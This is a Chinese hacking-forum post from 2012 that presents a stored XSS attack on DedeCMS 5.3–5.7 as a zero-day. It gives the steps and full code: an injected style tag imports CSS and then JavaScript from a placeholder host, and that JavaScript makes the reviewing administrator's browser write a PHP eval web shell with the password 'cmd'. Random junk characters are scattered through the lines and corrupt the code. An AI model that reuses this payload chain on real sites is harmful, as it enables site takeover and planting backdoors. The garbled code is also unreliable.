找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1733|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
0 i* [% o" c# v& P! _& D& h0 x为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)* h9 D) ~  L# e. i2 B
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。0 e! ^% u$ C( U- i
下面说说利用方法。
2 f2 b4 g8 z2 K2 s+ n: }) j条件有2个:
6 K% F( l) {2 x! l" E1.开启注册" g! O! t! P( b! t$ m
2.开启投稿
6 [0 i+ ]7 b! N& R注册会员----发表文章( e: r6 j8 y0 q" w
内容填写:) q5 N0 h, g( p1 W
复制代码' _' }  q$ q% H3 y
<style>@im\port'\http://xxx.com/xss.css';</style># }" V! e9 h7 N# J% D1 k( T& {
新建XSS.Css0 t0 @6 ^( u- Q( U
复制代码  }9 D9 N. w0 N, g% j7 g
.body{
! F- P0 N7 e' k, A7 A: Gbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }' x" O9 X+ s( J' `
新建xss.js 内容为. J; h$ O, F. M+ y$ X& X. i- H
复制代码
+ L6 n- e" v- M: [8 Q1.var request = false;* p1 N$ g$ y3 @7 h' [; E
2.if(window.XMLHttpRequest) {# y. H5 ^5 J: Y
3.request = new XMLHttpRequest();
7 v! @& D) o9 D6 T/ \; Y8 B" M4.if(request.overrideMimeType) {
0 q, c1 k4 N; i( W$ p& \4 A5.request.overrideMimeType('text/xml');3 |* |: }8 @: F# i
6.}' }& |2 h9 l4 E/ L, G$ o( U; B3 |
7.} else if(window.ActiveXObject) {) S8 r& d2 R' L, N- ^" B( p" K8 a! A
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
: u2 x6 b# z* ~0 I6 J9.for(var i=0; i<versions.length; i++) {
& ]  \* M) x5 Q. m( {3 }10.try {( y: v/ K" v' h" k, _- c
11.request = new ActiveXObject(versions);6 p+ `5 E( t+ k0 u; r" H% K
12.} catch(e) {}
% I3 J6 d; w; T) @' ~  ?5 D% r13.}  U9 S# s1 ?6 f4 \
14.}; G7 H8 X4 Z& {- V9 w! K+ h
15.xmlhttp=request;# M8 j, @) {( \- R/ ]
16.function getFolder( url ){- ?1 M3 ^- C& I0 h
17. obj = url.split('/')
3 _2 X- V! x: E. D18. return obj[obj.length-2]
: ]/ Y5 _0 _" u1 W19.}
3 q0 h+ C2 d, P) L20.oUrl = top.location.href;
% x% A% D/ ~) r$ V$ L# t21.u = getFolder(oUrl);
% C9 p8 [4 j/ k22.add_admin();
% c0 g& o8 K5 {23.function add_admin(){" {0 ?' T! s  G, b, H7 c
24.var url= "/"+u+"/sys_sql_query.php";
6 z( s) R/ X7 P" r3 h25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";& A4 l) C6 U# J* f  l" x. J2 O
26.xmlhttp.open("POST", url, true);
5 O8 z+ n4 O( {  a27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
, j" i& e# ~( k- O28.xmlhttp.setRequestHeader("Content-length", params.length);9 a7 A+ K7 D2 @: b
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");; P+ G: L/ r, ~8 _9 M, j
30.xmlhttp.send(params);! R7 m* g) b/ U* u4 A! Y# _1 X7 N
31.}: u2 a3 r* C' t# k& Y0 X
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表